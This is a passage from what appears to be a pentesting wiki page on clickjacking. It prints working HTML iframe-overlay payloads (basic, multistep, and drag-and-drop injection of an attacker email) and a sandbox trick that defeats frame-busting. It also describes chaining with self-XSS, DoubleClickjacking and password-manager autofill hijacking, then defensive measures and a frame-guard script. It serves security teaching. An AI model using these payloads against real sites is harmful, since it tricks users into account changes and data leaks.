Clickjacking

What is Clickjacking

In a clickjacking attack, a user is tricked into clicking an element on a web page that is either invisible or disguised as a different element. This manipulation can lead to unintended consequences for the user, such as downloading malware, being redirected to malicious web pages, providing credentials or sensitive information, transferring money, or purchasing products online.

Prepopulate forms trick

Sometimes it is possible to fill the values of a form's fields using GET parameters when the page loads. An attacker may abuse this behaviour to fill a form with arbitrary data and send the clickjacking payload so that the user presses the Submit button.

Populate form with Drag&Drop

If you need the user to fill a form but you don't want to directly ask him to write some specific information (like an email or a specific password that you already know), you can just ask him to Drag&Drop something that will write your controlled data, like in this example.

Basic Payload

```html
<style>
  iframe {
    position: relative;
    width: 500px;
    height: 700px;
    opacity: 0.1;
    z-index: 2;
  }
  div {
    position: absolute;
    top: 470px;
    left: 60px;
    z-index: 1;
  }
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>
```

Multistep Payload

```html
<style>
  iframe {
    position: relative;
    width: 500px;
    height: 500px;
    opacity: 0.1;
    z-index: 2;
  }
  .firstClick, .secondClick {
    position: absolute;
    top: 330px;
    left: 60px;
    z-index: 1;
  }
  .secondClick {
    left: 210px;
  }
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>
```

Drag&Drop + Click payload

```html
<html>
<head>
  <style>
    #payload {
      position: absolute;
      top: 20px;
    }
    iframe {
      width: 1000px;
      height: 675px;
      border: none;
    }
    .xss {
      position: fixed;
      background: #F00;
    }
  </style>
</head>
<body>
  <div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
  <div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
  <div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
  <iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3" src="https://target.com/panel/administration/profile/"></iframe>
  <div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>
```

XSS + Clickjacking

If you have identified an XSS attack that requires the user to click on some element to trigger the XSS, and the page is vulnerable to Clickjacking, you could abuse it to trick the user into clicking the button/link.
Example:
You found a self XSS in some private details of the account (details that only you can set and read). The page with the form to set these details is vulnerable to Clickjacking and you can prepopulate the form with the GET parameters.
An attacker could prepare a Clickjacking attack against that page, prepopulating the form with the XSS payload and tricking the user into submitting the form. So, when the form is submitted and the values are modified, the user will execute the XSS.

DoubleClickjacking

First explained in this post, this technique asks the victim to double click on a button of a custom page placed in a specific location, and uses the timing differences between the mousedown and onclick events to load the victim page during the double click, so that the victim actually clicks a legitimate button in the victim page.

An example could be seen in this video: https://www.youtube.com/watch?v=4rGvRRMrD18

A code example can be found in this page.

warning

This technique allows tricking the user into clicking on 1 place in the victim page, bypassing every protection against clickjacking. So the attacker needs to find sensitive actions that can be done with only 1 click, like OAuth prompts accepting permissions.

Browser extensions: DOM-based autofill clickjacking

Aside from iframing victim pages, attackers can target browser extension UI elements that are injected into the page. Password managers render autofill dropdowns near focused inputs; by focusing an attacker-controlled field and hiding/occluding the extension’s dropdown (opacity/overlay/top-layer tricks), a coerced user click can select a stored item and fill sensitive data into attacker-controlled inputs. This variant requires no iframe exposure and works entirely via DOM/CSS manipulation.

  • For concrete techniques and PoCs see:

BrowExt - ClickJacking

Strategies to Mitigate Clickjacking

Client-Side Defenses

Scripts executed on the client side can perform actions to prevent Clickjacking:

  • Ensuring that the application window is the main or top window.
  • Making all frames visible.
  • Preventing clicks on invisible frames.
  • Detecting and alerting users to potential Clickjacking attempts.

However, these frame-busting scripts can be circumvented:

  • Browsers' Security Settings: Some browsers might block these scripts based on their security settings or lack of JavaScript support.
  • HTML5 iframe sandbox Attribute: An attacker can neutralize frame buster scripts by setting the sandbox attribute with the allow-forms or allow-scripts values but without allow-top-navigation. This prevents the iframe from verifying whether it is the top window, e.g.,

```html
<iframe
  id="victim_website"
  src="https://victim-website.com"
  sandbox="allow-forms allow-scripts"></iframe>
```

The allow-forms and allow-scripts values enable actions within the iframe while disabling top-level navigation. To ensure the intended functionality of the targeted site, additional permissions like allow-same-origin and allow-modals might be necessary, depending on the attack type. Browser console messages can guide which permissions to allow.
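The checks listed above can be combined into a "hide until proven top-level" guard that stays safe even when the legacy frame bust is neutralized by a sandboxed iframe. This is an added example, not code from the original page; `frameGuard` takes the window and document as parameters, and the `makeTopLevelWindow`/`makeFramedWindow` helpers are constructed stand-ins so the logic can be exercised outside a browser.

```javascript
// Defensive guard: the body is hidden by default and revealed only when the
// window is the top-level window. If the page is framed, a frame bust is
// attempted; if the bust is blocked (e.g. sandbox="allow-forms allow-scripts"
// without allow-top-navigation), the content simply stays hidden, so an
// attacker's overlay never gets a clickable target.
function frameGuard(win, doc) {
  doc.body.style.display = 'none';          // default-deny

  if (win.self === win.top) {
    doc.body.style.display = 'block';       // top-level: safe to show
    return { framed: false, revealed: true, busted: false };
  }

  // Framed: try the legacy bust, but never rely on it succeeding.
  let busted = false;
  try {
    win.top.location = win.self.location;
    busted = win.top.location === win.self.location;
  } catch (e) {
    busted = false;                         // sandboxed iframe: assignment blocked
  }
  return { framed: true, revealed: false, busted };
}

// Constructed stand-ins (hypothetical, for running outside a browser).
function makeTopLevelWindow() {
  const w = { location: 'https://victim-website.com/account' };
  w.self = w; w.top = w;
  return w;
}
function makeFramedWindow(sandboxed) {
  const w = { location: 'https://victim-website.com/account' };
  w.self = w;
  w.top = sandboxed
    ? { get location() { return 'https://attacker.example/'; },
        set location(_) { throw new Error('SecurityError: top navigation blocked'); } }
    : { location: 'https://attacker.example/' };
  return w;
}
function newDoc() { return { body: { style: {} } }; }

// The three situations a defender cares about: top-level, plain frame, sandboxed frame.
function demo() {
  return {
    topLevel: frameGuard(makeTopLevelWindow(), newDoc()),
    plainFrame: frameGuard(makeFramedWindow(false), newDoc()),
    sandboxedFrame: frameGuard(makeFramedWindow(true), newDoc()),
  };
}
```

In a real page, hide the body with CSS first and run `frameGuard(window, document)` as early as possible in `<head>`, so there is no visible, clickable window before the check runs; it complements rather than replaces the server-side headers described below.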

Server-Side Defenses

X-Frame-Options

The X-Frame-Options HTTP response header informs the browser whether, in a or